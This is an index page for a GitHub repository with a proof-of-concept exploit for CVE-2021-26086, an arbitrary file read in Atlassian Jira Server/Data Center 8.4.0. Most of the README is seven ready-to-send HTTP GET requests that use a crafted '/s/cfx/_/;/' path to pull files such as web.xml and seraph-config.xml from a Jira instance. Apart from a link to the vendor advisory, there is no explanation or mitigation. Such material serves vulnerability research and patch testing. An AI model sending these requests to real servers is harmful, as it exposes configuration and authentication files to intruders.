Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/ColdFusionX/CVE-2021-26086

Atlassian Jira Server/Data Center 8.4.0 - Arbitrary File read (CVE-2021-26086)
https://github.com/ColdFusionX/CVE-2021-26086

cve-2021-26086 file-read-vulnerability jira

Last synced: about 1 month ago
JSON representation

Atlassian Jira Server/Data Center 8.4.0 - Arbitrary File read (CVE-2021-26086)

Host: GitHub
URL: https://github.com/ColdFusionX/CVE-2021-26086
Owner: ColdFusionX
License: mit
Created: 2021-10-05T14:09:52.000Z (almost 3 years ago)
Default Branch: main
Last Pushed: 2021-10-12T05:16:48.000Z (almost 3 years ago)
Last Synced: 2024-02-11T21:18:12.517Z (7 months ago)
Topics: cve-2021-26086, file-read-vulnerability, jira
Homepage:
Size: 2.93 KB
Stars: 24
Watchers: 1
Forks: 7
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-hacking-lists - ColdFusionX/CVE-2021-26086 - Atlassian Jira Server/Data Center 8.4.0 - Arbitrary File read (CVE-2021-26086) (Others)

README

        # CVE-2021-26086

Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include

Vulnerable Endpoints:

```

WEB-INF/web.xml

WEB-INF/decorators.xml

WEB-INF/classes/seraph-config.xml

META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties

META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml

META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

```

POC File #1 - web.xml

```

GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1

Host: 127.0.0.1:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

```

POC File #2 - seraph-config.xml

```

GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1

Host: 127.0.0.1:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

```

POC File #3 - decorators.xml

```

GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1

Host: 127.0.0.1:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

```

POC File #4 - /jira-webapp-dist/pom.properties

```

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1

Host: 127.0.0.1:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

```

POC File #5 - /jira-webapp-dist/pom.xml

```

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1

Host: 127.0.0.1:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

```

POC File #6 - /atlassian-jira-webapp/pom.xml

```

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1

Host: 127.0.0.1:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

```

POC File #7 - /atlassian-jira-webapp/pom.properties

```

GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1

Host: 127.0.0.1:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

```

- For more information related to this vulnerability please refer to [JRASERVER-72695](https://jira.atlassian.com/browse/JRASERVER-72695)